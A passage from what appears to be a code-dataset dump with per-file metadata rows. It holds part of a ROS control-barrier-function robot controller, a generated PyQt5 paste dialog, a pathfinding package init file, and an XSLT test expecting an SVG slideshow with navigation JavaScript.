b[2*len(UnsafeList)+2*len(u_s)+j] = -Map.CBF[j](x_r)
# Adding Goal based Lyapunov !!!!!!!!!!!!!!!!! Needs to be changed for a different example
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),0:2] = [Goal.Lyap(x_r,[1,0]), Goal.Lyap(x_r,[0, 1])]
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),-1] = -1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)] = 0
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1,-1] = 1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1] = np.finfo(float).eps+1
H = np.zeros((len(u_s)+len(UnsafeList)+len(Map.set)+1,len(u_s)+len(UnsafeList)+len(Map.set)+1))
H[0,0] = 0
H[1,1] = 0
ff = np.zeros((len(u_s)+len(UnsafeList)+len(Map.set)+1,1))
ff[len(u_s):len(u_s)+len(UnsafeList)] = 20
ff[len(u_s)+len(UnsafeList):len(u_s)+len(UnsafeList)+len(Map.set)] = 10
ff[-1] = np.ceil(self.count/100.0)
try:
uq = cvxopt_solve_qp(H, ff, A, b)
except ValueError:
uq = [0,0]
rospy.loginfo('Domain Error in cvx')
if uq is None:
uq = [0,0]
rospy.loginfo('infeasible QP')
if findBestCommandAnyway and len(uq[2:len(uq)-2*len(Map.set)-1:2])>0: # If humans are around and findbestcommand active
if InUnsafe:
self.trajs.risk.append(1.0)
else:
r = np.zeros(len(uq[2:len(uq)-2*len(Map.set)-1:2]))
for k in range(len(uq[2:len(uq)-2*len(Map.set)-1:2])):
r[k] = min(1, max(0,1-(1-Unsafe.CBF(x_r, x_o[UnsafeList[k]][0:2]))*exp(-uq[2*k+2]*T)))
self.trajs.risk.append(max(r))
elif not findBestCommandAnyway and len(uq[2:len(uq)-len(Map.set)-1])>0:
r = np.zeros(len(uq[2:len(uq)-len(Map.set)-1]))
for k in range(len(uq[2:len(uq)-len(Map.set)-1])):
r[k] = min(1, max(0,1-(1-Unsafe.CBF(x_r, x_o[UnsafeList[k]][0:2]))*exp(-uq[k+2]*T)))
self.trajs.risk.append(max(r))
if max(r)>0.1:
1
elif not findBestCommandAnyway and len(uq) == 2: # feasible solution is not found
self.trajs.risk.append(-risk) # meaning that solution is not found
else: # No human is around
self.trajs.risk.append(0.0)
self.trajs.minDist.append(minDist)
return uq
if __name__ == '__main__':
## Parameters
findBestCommandAnyway = 1 #make this zero if you don't want to do anything if it's riskier than intended
#use 1 if you want to do the best even if there is risk
plotanimation = 0
# Goal info
GoalCenter = np.array([0, 0])
rGoal = np.power(0.5,2)
# Unsafe
UnsafeInclude = 9 # consider obstacle if in radius
UnsafeRadius = 0.5 #radius of unsafe sets/distance from obstacles
# Enviroment Bounds
env_bounds = type('', (), {})()
env_bounds.y_min = -1.2
env_bounds.y_max = 1
# env_bounds.x_max = 1.25
# env_bounds.x_min = -1.35
l = 0.01 #bicycle model approximation parameter
U = np.array([[-0.33,0.33],[-0.3,0.3]])
T = 1 #Lookahead horizon
risk = 0.1 # max risk desired
gamma = 5 # CBF coefficient
u1d = 0 # desired input to save energy!
# Plotting options
plotit = 1
plotlanes = 1
robot = robot(l)
GoalInfo = robot.GoalFuncs(GoalCenter,rGoal)
UnsafeInfo = robot.UnsafeFuncs(gamma,UnsafeRadius)
MapInfo = robot.MapFuncs(env_bounds)
# Process arguments
p = argparse.ArgumentParser(description='CBF controller')
args = p.parse_args(rospy.myargv()[1:])
try:
rospy.init_node('cbf_controller')
cbf_controller = CBF_CONTROLLER(robot,GoalInfo,UnsafeInfo,MapInfo)
control_priod = 0.05 #[sec] we can change controll priod with this parameter.
rospy.Timer(rospy.Duration(control_priod), cbf_controller.controller_loop_callback)
rospy.spin()
except rospy.ROSInterruptException:
pass
plottrajs(cbf_controller.trajs)
| 51.393773
| 222
| 0.490218
| 21,357
| 0.761092
| 0
| 0
| 0
| 0
| 0
| 0
| 4,187
| 0.149211
|
4262af6285d912525c9c840db4e454a16f646f01
| 5,250
|
py
|
Python
|
src/gui/ui_paste_dialog.py
|
tonypdmtr/sxtool
|
225468d70c5fe1bf7414f19ce13dcdd43e872433
|
[
"BSD-2-Clause"
] | 3
|
2018-10-11T15:34:24.000Z
|
2022-02-20T23:24:01.000Z
|
src/gui/ui_paste_dialog.py
|
tonypdmtr/sxtool
|
225468d70c5fe1bf7414f19ce13dcdd43e872433
|
[
"BSD-2-Clause"
] | 1
|
2018-10-16T06:58:22.000Z
|
2018-10-22T20:19:55.000Z
|
src/gui/ui_paste_dialog.py
|
tonypdmtr/sxtool
|
225468d70c5fe1bf7414f19ce13dcdd43e872433
|
[
"BSD-2-Clause"
] | 1
|
2022-02-20T23:26:50.000Z
|
2022-02-20T23:26:50.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src/gui/ui_paste_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PasteDialog(object):
def setupUi(self, PasteDialog):
PasteDialog.setObjectName("PasteDialog")
PasteDialog.resize(403, 205)
self.gridLayout = QtWidgets.QGridLayout(PasteDialog)
self.gridLayout.setContentsMargins(11, 11, 11, 11)
self.gridLayout.setSpacing(6)
self.gridLayout.setObjectName("gridLayout")
self.buttonGroupMain = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupMain.setObjectName("buttonGroupMain")
self.radioReplaceSelection = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioReplaceSelection.setGeometry(QtCore.QRect(10, 40, 120, 20))
self.radioReplaceSelection.setObjectName("radioReplaceSelection")
self.radioAddLines = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioAddLines.setGeometry(QtCore.QRect(10, 20, 100, 20))
self.radioAddLines.setChecked(True)
self.radioAddLines.setObjectName("radioAddLines")
self.gridLayout.addWidget(self.buttonGroupMain, 0, 0, 1, 1)
self.buttonGroupReplace = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupReplace.setEnabled(False)
self.buttonGroupReplace.setObjectName("buttonGroupReplace")
self.verticalLayout = QtWidgets.QVBoxLayout(self.buttonGroupReplace)
self.verticalLayout.setContentsMargins(11, 11, 11, 11)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.radioSelectionOnly = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionOnly.setObjectName("radioSelectionOnly")
self.verticalLayout.addWidget(self.radioSelectionOnly)
self.radioSelectionAndReplace = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndReplace.setObjectName("radioSelectionAndReplace")
self.verticalLayout.addWidget(self.radioSelectionAndReplace)
self.radioSelectionAndAdd = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndAdd.setChecked(True)
self.radioSelectionAndAdd.setObjectName("radioSelectionAndAdd")
self.verticalLayout.addWidget(self.radioSelectionAndAdd)
self.gridLayout.addWidget(self.buttonGroupReplace, 0, 1, 2, 1)
self.buttonGroupAdd = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupAdd.setEnabled(True)
self.buttonGroupAdd.setObjectName("buttonGroupAdd")
self.radioAfterSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioAfterSelection.setGeometry(QtCore.QRect(10, 40, 130, 20))
self.radioAfterSelection.setObjectName("radioAfterSelection")
self.radioBeforeSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioBeforeSelection.setGeometry(QtCore.QRect(10, 20, 140, 20))
self.radioBeforeSelection.setChecked(True)
self.radioBeforeSelection.setObjectName("radioBeforeSelection")
self.gridLayout.addWidget(self.buttonGroupAdd, 1, 0, 1, 1)
self.pushOk = QtWidgets.QPushButton(PasteDialog)
self.pushOk.setObjectName("pushOk")
self.gridLayout.addWidget(self.pushOk, 2, 0, 1, 1)
self.pushCancel = QtWidgets.QPushButton(PasteDialog)
self.pushCancel.setObjectName("pushCancel")
self.gridLayout.addWidget(self.pushCancel, 2, 1, 1, 1)
self.retranslateUi(PasteDialog)
self.pushOk.clicked.connect(PasteDialog.accept)
self.pushCancel.clicked.connect(PasteDialog.reject)
self.radioAddLines.toggled['bool'].connect(self.buttonGroupAdd.setEnabled)
self.radioReplaceSelection.toggled['bool'].connect(self.buttonGroupReplace.setEnabled)
QtCore.QMetaObject.connectSlotsByName(PasteDialog)
def retranslateUi(self, PasteDialog):
_translate = QtCore.QCoreApplication.translate
PasteDialog.setWindowTitle(_translate("PasteDialog", "Paste mode"))
self.buttonGroupMain.setTitle(_translate("PasteDialog", "Pasting mode"))
self.radioReplaceSelection.setText(_translate("PasteDialog", "Replace selection"))
self.radioAddLines.setText(_translate("PasteDialog", "Add lines"))
self.buttonGroupReplace.setTitle(_translate("PasteDialog", "How do you want to replace lines ?"))
self.radioSelectionOnly.setText(_translate("PasteDialog", "Selection only"))
self.radioSelectionAndReplace.setText(_translate("PasteDialog", "If selection is too small, replace\n"
"the lines after"))
self.radioSelectionAndAdd.setText(_translate("PasteDialog", "If selection is too small, \n"
"add new lines"))
self.buttonGroupAdd.setTitle(_translate("PasteDialog", "Where do you want to add lines ?"))
self.radioAfterSelection.setText(_translate("PasteDialog", "After selection"))
self.radioBeforeSelection.setText(_translate("PasteDialog", "Before selection"))
self.pushOk.setText(_translate("PasteDialog", "OK"))
self.pushCancel.setText(_translate("PasteDialog", "Cancel"))
| 58.333333
| 110
| 0.739619
| 4,992
| 0.950857
| 0
| 0
| 0
| 0
| 0
| 0
| 938
| 0.178667
|
4262ea9b91c2ce1c0da94f2913617caab9285e6f
| 110
|
py
|
Python
|
app/pathfinding/finder/__init__.py
|
TheronHa/Spaghetti
|
e181c2f7ea0c044fb7d0edb36bd203dac2eabaf9
|
[
"MIT"
] | 208
|
2017-01-23T17:45:13.000Z
|
2022-03-22T22:27:25.000Z
|
app/pathfinding/finder/__init__.py
|
TheronHa/Spaghetti
|
e181c2f7ea0c044fb7d0edb36bd203dac2eabaf9
|
[
"MIT"
] | 31
|
2017-10-28T09:21:06.000Z
|
2021-09-26T15:38:36.000Z
|
app/pathfinding/finder/__init__.py
|
TheronHa/Spaghetti
|
e181c2f7ea0c044fb7d0edb36bd203dac2eabaf9
|
[
"MIT"
] | 60
|
2016-12-13T00:05:36.000Z
|
2022-03-21T22:23:49.000Z
|
__all__ = ['a_star', 'best_first', 'bi_a_star', 'breadth_first', 'dijkstra',
'finder', 'ida_star']
| 36.666667
| 76
| 0.609091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 74
| 0.672727
|
4263245bfbde431be1ac8c88739a3f1f392bf22f
| 34,891
|
py
|
Python
|
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/uo_20000929.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | null | null | null |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/uo_20000929.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | null | null | null |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/uo_20000929.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | 1
|
2020-07-26T03:57:45.000Z
|
2020-07-26T03:57:45.000Z
|
#Uche's test from Sun's SVG slide publisher
import os
from Xml.Xslt import test_harness
#From Sun's toolkit
sheet_1_uri = "Xml/Xslt/Borrowed/svgslides.xsl"
sheet_2_uri = "Xml/Xslt/Borrowed/svgslides_custom.xsl"
sheet_3_uri = "Xml/Xslt/Borrowed/slidescript.xsl"
source_1_uri = "Xml/Xslt/Borrowed/slides4svg.xml"
saxon_output = """"""
expected_1 = """<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="slides.css" type="text/css"?>
<svg height='768' width='1024' style='pointer-events:visible' xml:space='preserve' onload='initSlides(evt)' xmlns:xlink='http://www.w3.org/2000/xlink/namespace/'>
<script><![CDATA[
var doc = null;
// Called upon presentation loading
function initSlides(evt){
var target = evt.getTarget();
doc = target.getOwnerDocument();
hideAndShow(evt, curSlide, curSlide);
}
function onPrevSlide(evt){
// Process new current slide
var oldCurSlide = curSlide;
curSlide = curSlide - 1;
if(curSlide < 0){
curSlide = slideList.length - 1;
}
hideAndShow(evt, oldCurSlide, curSlide);
}
function onNextSlide(evt){
// Process new current slide
var prevSlide = curSlide;
curSlide = curSlide + 1;
if(curSlide > (slideList.length - 1)){
curSlide = 0;
}
hideAndShow(evt, prevSlide, curSlide);
// alert("onNextSlide");
}
function hideAndShow(evt, hideSlide, showSlide){
// alert("Hiding : " + hideSlide + " and showing : " + showSlide);
// Hide previous current slide and show new
// one.
var hideSlideName = slideList[hideSlide];
var showSlideName = slideList[showSlide];
/*if(hideSlideName == null)
alert("hideSlideName is null");
else
alert("hideSlideName is NOT null:" + hideSlideName);*/
var slideGroup = doc.getElementById(hideSlideName);
slideGroup.setAttribute("style", "visibility:hidden");
slideGroup = doc.getElementById(showSlideName);
slideGroup.setAttribute("style", "visibility:show");
var slideMenuItemId = slideList[hideSlide] + "MenuItem";
var menuItem = doc.getElementById(slideMenuItemId);
if(menuItem != null)
menuItem.setAttribute("class", "slideMenuItem");
slideMenuItemId = slideList[showSlide] + "MenuItem";
menuItem = doc.getElementById(slideMenuItemId);
if(menuItem != null)
menuItem.setAttribute("class", "currentSlideMenuItem");
}
function onHighlightMenuItem(evt, highlight, itemId){
var target = evt.getTarget();
var doc = target.getOwnerDocument();
var menuItem = doc.getElementById(itemId);
if(highlight == "true")
menuItem.setAttribute("class", "highlightedSlideMenuItem");
else{
var curSlideMenuItemId = slideList[curSlide] + "MenuItem";
if(curSlideMenuItemId == itemId)
menuItem.setAttribute("class", "currentSlideMenuItem");
else
menuItem.setAttribute("class", "slideMenuItem");
}
}
function onMenuItemSelected(evt, index){
// alert("Should show slide # " + index);
var oldCurSlide = curSlide;
curSlide = index;
hideAndShow(evt, oldCurSlide, index);
}
function onSetFill(evt, elementId, fillValue){
var element = doc.getElementById(elementId);
element.setAttribute("style", "fill:" + fillValue);
}
function onExpand(evt, submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:hidden");
var javaScriptCode = "window.expandNow('" + submenuGroupId + "')";
window.expandNow = expandNow;
setTimeout(javaScriptCode, 1000);
}
function expandNow(submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:show");
}
function onCollapse(evt, submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:hidden");
}
]]></script>
<script><![CDATA[
var slideList = new Array();
var slideIndex = new Object();
var curSlide = 0;
slideList[0]="slideShowCover";
slideIndex["slideShowCover"] = 0;
slideList[1]="slidesetCover1";
slideIndex["slidesetCover1"] = 1;
slideList[2] = "slide1-1";
slideIndex["slide1-1"] = 2;
slideList[3]="slidesetCover2";
slideIndex["slidesetCover2"] = 3;
slideList[4] = "slide2-1";
slideIndex["slide2-1"] = 4;
slideList[5] = "slide2-2";
slideIndex["slide2-2"] = 5;
slideList[6] = "slide2-3";
slideIndex["slide2-3"] = 6;
slideList[7]="slidesetCover3";
slideIndex["slidesetCover3"] = 7;
slideList[8] = "slide3-1";
slideIndex["slide3-1"] = 8;
slideList[9] = "slide3-2";
slideIndex["slide3-2"] = 9;
]]></script>
<defs>
<linearGradient spreadMethod='pad' id='slideBackgroundPaint' x1='0' y2='768' x2='1024' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='100%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='slideTitleSeparatorPaint' x1='0' y2='0' x2='1024' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:rgb(23, 27, 77); stop-opacity:1;'/>
<stop offset='.5' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:rgb(23, 27, 77); stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='menuBarPaint' x1='0' y2='0' x2='210' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='50%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:white; stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='slideBackgroundHeaderPaint' x1='0' y2='100' x2='0' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='50%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:white; stop-opacity:1;'/>
</linearGradient>
<g id='stripePattern'>
<g style='fill:black; fill-opacity:.25'>
<rect height='2' width='1' y='0'/>
<rect height='2' width='1' y='4'/>
<rect height='2' width='1' y='8'/>
<rect height='2' width='1' y='12'/>
<rect height='2' width='1' y='16'/>
<rect height='2' width='1' y='20'/>
<rect height='2' width='1' y='24'/>
<rect height='2' width='1' y='28'/>
<rect height='2' width='1' y='32'/>
<rect height='2' width='1' y='36'/>
<rect height='2' width='1' y='40'/>
<rect height='2' width='1' y='44'/>
<rect height='2' width='1' y='48'/>
<rect height='2' width='1' y='52'/>
<rect height='2' width='1' y='56'/>
<rect height='2' width='1' y='60'/>
<rect height='2' width='1' y='64'/>
<rect height='2' width='1' y='68'/>
<rect height='2' width='1' y='72'/>
<rect height='2' width='1' y='76'/>
<rect height='2' width='1' y='80'/>
<rect height='2' width='1' y='84'/>
<rect height='2' width='1' y='88'/>
<rect height='2' width='1' y='92'/>
<rect height='2' width='1' y='96'/>
<rect height='2' width='1' y='100'/>
<rect height='2' width='1' y='104'/>
<rect height='2' width='1' y='108'/>
<rect height='2' width='1' y='112'/>
<rect height='2' width='1' y='116'/>
<rect height='2' width='1' y='120'/>
<rect height='2' width='1' y='124'/>
<rect height='2' width='1' y='128'/>
<rect height='2' width='1' y='132'/>
<rect height='2' width='1' y='136'/>
<rect height='2' width='1' y='140'/>
<rect height='2' width='1' y='144'/>
<rect height='2' width='1' y='148'/>
<rect height='2' width='1' y='152'/>
<rect height='2' width='1' y='156'/>
<rect height='2' width='1' y='160'/>
<rect height='2' width='1' y='164'/>
<rect height='2' width='1' y='168'/>
<rect height='2' width='1' y='172'/>
<rect height='2' width='1' y='176'/>
<rect height='2' width='1' y='180'/>
<rect height='2' width='1' y='184'/>
<rect height='2' width='1' y='188'/>
<rect height='2' width='1' y='192'/>
<rect height='2' width='1' y='196'/>
<rect height='2' width='1' y='200'/>
<rect height='2' width='1' y='204'/>
<rect height='2' width='1' y='208'/>
<rect height='2' width='1' y='212'/>
<rect height='2' width='1' y='216'/>
<rect height='2' width='1' y='220'/>
<rect height='2' width='1' y='224'/>
<rect height='2' width='1' y='228'/>
<rect height='2' width='1' y='232'/>
<rect height='2' width='1' y='236'/>
<rect height='2' width='1' y='240'/>
<rect height='2' width='1' y='244'/>
<rect height='2' width='1' y='248'/>
<rect height='2' width='1' y='252'/>
<rect height='2' width='1' y='256'/>
<rect height='2' width='1' y='260'/>
<rect height='2' width='1' y='264'/>
<rect height='2' width='1' y='268'/>
<rect height='2' width='1' y='272'/>
<rect height='2' width='1' y='276'/>
<rect height='2' width='1' y='280'/>
<rect height='2' width='1' y='284'/>
<rect height='2' width='1' y='288'/>
<rect height='2' width='1' y='292'/>
<rect height='2' width='1' y='296'/>
<rect height='2' width='1' y='300'/>
<rect height='2' width='1' y='304'/>
<rect height='2' width='1' y='308'/>
<rect height='2' width='1' y='312'/>
<rect height='2' width='1' y='316'/>
<rect height='2' width='1' y='320'/>
<rect height='2' width='1' y='324'/>
<rect height='2' width='1' y='328'/>
<rect height='2' width='1' y='332'/>
<rect height='2' width='1' y='336'/>
<rect height='2' width='1' y='340'/>
<rect height='2' width='1' y='344'/>
<rect height='2' width='1' y='348'/>
<rect height='2' width='1' y='352'/>
<rect height='2' width='1' y='356'/>
<rect height='2' width='1' y='360'/>
<rect height='2' width='1' y='364'/>
<rect height='2' width='1' y='368'/>
<rect height='2' width='1' y='372'/>
<rect height='2' width='1' y='376'/>
<rect height='2' width='1' y='380'/>
<rect height='2' width='1' y='384'/>
<rect height='2' width='1' y='388'/>
<rect height='2' width='1' y='392'/>
<rect height='2' width='1' y='396'/>
<rect height='2' width='1' y='400'/>
<rect height='2' width='1' y='404'/>
<rect height='2' width='1' y='408'/>
<rect height='2' width='1' y='412'/>
<rect height='2' width='1' y='416'/>
<rect height='2' width='1' y='420'/>
<rect height='2' width='1' y='424'/>
<rect height='2' width='1' y='428'/>
<rect height='2' width='1' y='432'/>
<rect height='2' width='1' y='436'/>
<rect height='2' width='1' y='440'/>
<rect height='2' width='1' y='444'/>
<rect height='2' width='1' y='448'/>
<rect height='2' width='1' y='452'/>
<rect height='2' width='1' y='456'/>
<rect height='2' width='1' y='460'/>
<rect height='2' width='1' y='464'/>
<rect height='2' width='1' y='468'/>
<rect height='2' width='1' y='472'/>
<rect height='2' width='1' y='476'/>
<rect height='2' width='1' y='480'/>
<rect height='2' width='1' y='484'/>
<rect height='2' width='1' y='488'/>
<rect height='2' width='1' y='492'/>
<rect height='2' width='1' y='496'/>
<rect height='2' width='1' y='500'/>
<rect height='2' width='1' y='504'/>
<rect height='2' width='1' y='508'/>
<rect height='2' width='1' y='512'/>
<rect height='2' width='1' y='516'/>
<rect height='2' width='1' y='520'/>
<rect height='2' width='1' y='524'/>
<rect height='2' width='1' y='528'/>
<rect height='2' width='1' y='532'/>
<rect height='2' width='1' y='536'/>
<rect height='2' width='1' y='540'/>
<rect height='2' width='1' y='544'/>
<rect height='2' width='1' y='548'/>
<rect height='2' width='1' y='552'/>
<rect height='2' width='1' y='556'/>
<rect height='2' width='1' y='560'/>
<rect height='2' width='1' y='564'/>
<rect height='2' width='1' y='568'/>
<rect height='2' width='1' y='572'/>
<rect height='2' width='1' y='576'/>
<rect height='2' width='1' y='580'/>
<rect height='2' width='1' y='584'/>
<rect height='2' width='1' y='588'/>
<rect height='2' width='1' y='592'/>
<rect height='2' width='1' y='596'/>
<rect height='2' width='1' y='600'/>
<rect height='2' width='1' y='604'/>
<rect height='2' width='1' y='608'/>
<rect height='2' width='1' y='612'/>
<rect height='2' width='1' y='616'/>
<rect height='2' width='1' y='620'/>
<rect height='2' width='1' y='624'/>
<rect height='2' width='1' y='628'/>
<rect height='2' width='1' y='632'/>
<rect height='2' width='1' y='636'/>
<rect height='2' width='1' y='640'/>
<rect height='2' width='1' y='644'/>
<rect height='2' width='1' y='648'/>
<rect height='2' width='1' y='652'/>
<rect height='2' width='1' y='656'/>
<rect height='2' width='1' y='660'/>
<rect height='2' width='1' y='664'/>
<rect height='2' width='1' y='668'/>
<rect height='2' width='1' y='672'/>
<rect height='2' width='1' y='676'/>
<rect height='2' width='1' y='680'/>
<rect height='2' width='1' y='684'/>
<rect height='2' width='1' y='688'/>
<rect height='2' width='1' y='692'/>
<rect height='2' width='1' y='696'/>
<rect height='2' width='1' y='700'/>
<rect height='2' width='1' y='704'/>
<rect height='2' width='1' y='708'/>
<rect height='2' width='1' y='712'/>
<rect height='2' width='1' y='716'/>
<rect height='2' width='1' y='720'/>
<rect height='2' width='1' y='724'/>
<rect height='2' width='1' y='728'/>
<rect height='2' width='1' y='732'/>
<rect height='2' width='1' y='736'/>
<rect height='2' width='1' y='740'/>
<rect height='2' width='1' y='744'/>
<rect height='2' width='1' y='748'/>
<rect height='2' width='1' y='752'/>
<rect height='2' width='1' y='756'/>
<rect height='2' width='1' y='760'/>
<rect height='2' width='1' y='764'/>
<rect height='2' width='1' y='768'/>
<rect height='2' width='1' y='772'/>
<rect height='2' width='1' y='776'/>
<rect height='2' width='1' y='780'/>
<rect height='2' width='1' y='784'/>
<rect height='2' width='1' y='788'/>
<rect height='2' width='1' y='792'/>
<rect height='2' width='1' y='796'/>
</g>
</g>
<g id='bullet' transform='translate(0, -20)'>
<path style='stroke:white; stroke-width:2; fill:none' d='M0.436,1.418C7.853-1.088,16.396,1.706,19.52,7.658c2.498,4.762-0.287,10.248-6.22,12.252c-4.747,1.604-10.215-0.184-12.213-3.993c-1.599-3.048,0.183-6.559,3.981-7.842c3.038-1.026,6.538,0.118,7.816,2.556 c1.024,1.951-0.117,4.198-2.547,5.019c-1.945,0.657-4.185-0.076-5.003-1.636c-0.655-1.248,0.075-2.686,1.63-3.212c1.245-0.42,2.678,0.048,3.202,1.047'/>
</g>
</defs>
<g id='slideBackground' class='slideBackground'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='668' style='fill:url(#menuBarPaint)' width='210' x='0' y='100'/>
<rect height='100' style='fill:url(#slideBackgroundHeaderPaint)' width='1024' x='0' y='0'/>
<use xlink:href='#stripePattern' transform='scale(1024, 1)'/>
<rect height='5' style='fill:url(#slideTitleSeparatorPaint)' width='1024' x='0' y='100'/>
</g>
<g id='navigationGroup' style='fill:white' transform='translate(984, 45) scale(2, 2)'>
<polygon id='prevSlideControl' onclick='onPrevSlide(evt)' onmouseover="onSetFill(evt, 'prevSlideControl', 'rgb(176, 22, 40)')" points='1 10 10 0 1 -10 1 10' onmouseout="onSetFill(evt, 'prevSlideControl', 'white')" transform='rotate(180)'/>
<polygon id='nextSlideControl' onclick='onNextSlide(evt)' onmouseover="onSetFill(evt, 'nextSlideControl', 'rgb(176, 22, 40)')" points='1 10 10 0 1 -10 1 10' onmouseout="onSetFill(evt, 'nextSlideControl', 'white')"/>
</g>
<g id='slideMenu' transform='translate(15, 130)'>
<text onclick='onMenuItemSelected(evt, 1)' class='slidesetMenuHeader' x='0' y='0'>Background and Motivation</text>
<g style='visibility:visible'>
<rect height='5' id='Expand1' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu1')" style='fill:white' width='5'/>
<rect height='5' id='Collapse1' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu1')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse1.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand1.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse1.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand1.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu1'>
<text id='slide1-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide1-1MenuItem')" onclick='onMenuItemSelected(evt, 2)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide1-1MenuItem')" class='slideMenuItem'>Why Yet Another Grap...</text>
</g>
<g transform='translate(0, 20)'>
<g>
<text onclick='onMenuItemSelected(evt, 3)' class='slidesetMenuHeader' x='0' y='0'>The ABCs of SVG</text>
<g style='visibility:visible'>
<rect height='5' id='Expand2' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu2')" style='fill:white' width='5'/>
<rect height='5' id='Collapse2' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu2')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse2.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand2.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse2.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand2.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu2'>
<text id='slide2-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-1MenuItem')" onclick='onMenuItemSelected(evt, 4)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-1MenuItem')" class='slideMenuItem'>SVG Features</text>
<text id='slide2-2MenuItem' x='10' y='40' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-2MenuItem')" onclick='onMenuItemSelected(evt, 5)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-2MenuItem')" class='slideMenuItem'>SVG Sample Source</text>
<text id='slide2-3MenuItem' x='10' y='60' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-3MenuItem')" onclick='onMenuItemSelected(evt, 6)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-3MenuItem')" class='slideMenuItem'>SVG Sample Output</text>
</g>
<g transform='translate(0, 20)'>
<g>
<text onclick='onMenuItemSelected(evt, 7)' class='slidesetMenuHeader' x='0' y='0'>The SVG Community</text>
<g style='visibility:visible'>
<rect height='5' id='Expand3' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu3')" style='fill:white' width='5'/>
<rect height='5' id='Collapse3' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu3')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse3.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand3.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse3.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand3.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu3'>
